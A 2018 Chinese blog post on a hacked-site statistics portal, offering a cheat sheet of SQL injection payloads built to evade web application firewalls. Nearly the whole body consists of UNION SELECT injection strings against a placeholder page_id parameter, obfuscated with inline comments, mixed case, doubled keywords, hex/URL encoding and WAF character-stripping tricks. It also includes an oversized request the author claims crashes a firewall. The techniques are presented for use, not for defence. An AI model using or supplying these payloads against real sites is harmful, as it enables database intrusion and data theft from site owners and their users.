sql注入基本简单绕过方法大全


发布人:HeiTao分类:网络安全浏览量:481发布时间:2018-10-08

sql注入基本简单绕过方法大全


基本/简单绕过方法:

  1、注释符

  http://www.*.com/index.php?page_id=-15 /*!UNION*/ /*!SELECT*/ 1,2,3,4….

  2、使用大小写

  http://www.*.com/index.php?page_id=-15 uNIoN sELecT 1,2,3,4….

  3、结合前面两种方法

  http://www.*.com/index.php?page_id=-15 /*!uNIOn*/ /*!SelECt*/ 1,2,3,4….

  4、关键字替换

  http://www.*.com/index.php?page_id=-15 UNIunionON SELselectECT 1,2,3,4….

  5、内部注释

  http://www.*.com/index.php?page_id=-15 %55nION/**/%53ElecT 1,2,3,4…

  U替换为%55,S替换为%53 在 union 和 select 之间添加注释/**/

  高级绕过方法

  1、缓冲区溢出/使防火墙崩溃

  大部分防火墙都是基于C/C++开发的,我们可以使用缓冲区溢出使用WAF崩溃

  http://www.*.com/index.php?page_id=-15+and+(select1)=(Select 0xAA[..(add about 1000 "A")..])+/*!uNIOn*/+/*!SeLECt*/+1,2,3,4….

  你可以使用如下方法测试WAF

  ?page_id=null%0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/+1,2,3,4….

  如果返回500错误,你就可以使用缓冲区溢出的方法来绕过WAF

  2、对字母进行编码

  http://www.*.com/index.php?page_id=-15 /*!u%6eion*/ /*!se%6cect*/ 1,2,3,4….

  3、使用其他变量或者命令对注入语句进行替换

  COMMAND | WHAT TO USE INSTEAD

  @@version | version()

  concat() | concat_ws()

  group_concat() | concat_ws()

  4、利用WAF本身的功能绕过

  假如你发现WAF会把"*"替换为空,那么你就可以利用这一特性来进行绕过

  ‍‍‍‍‍‍‍‍http://www.*.com/index.php?page_id=-15+uni*on+sel*ect+1,2,3,4....

  其它方法:-15+(uNioN)+(sElECt)….-15+(uNioN+SeleCT)+…-15+(UnI)(oN)+(SeL)(ecT)+….-15+union (select 1,2,3,4…)

被黑站点统计 - 文章版权1、本主题所有言论和图片纯属会员个人意见,与本文章立场无关
2、本站所有主题由该文章作者发表,该文章作者与被黑站点统计享有文章相关版权
3、其他单位或个人使用、转载或引用本文时必须同时征得该文章作者和被黑站点统计的同意
4、文章作者须承担一切因本文发表而直接或间接导致的民事或刑事法律责任
5、本帖部分内容转载自其它媒体,但并不代表本站赞同其观点和对其真实性负责
6、如本帖侵犯到任何版权问题,请立即告知本站,本站将及时予与删除并致以最深的歉意
7、被黑站点统计管理员有权不事先通知发贴者而删除本文

免责声明

本站主要通过网络搜集国内被黑网站信息,统计分析数据,为部署安全型网络提供强有力的依据.本站所有工作人员均不参与黑站,挂马或赢利性行为,所有数据均为网民提供,提交者不一定是黑站人,所有提交采取不记名,先提交先审核的方式,如有任何疑问请及时与我们联系.

HeiTao  的文章


微信公众号

微信公众号


Copyright © 2012-2022被黑网站统计系统All Rights Reserved
页面总访问量:21455953(PV) 页面执行时间:103.316(MS)
  • xml
  • 网站地图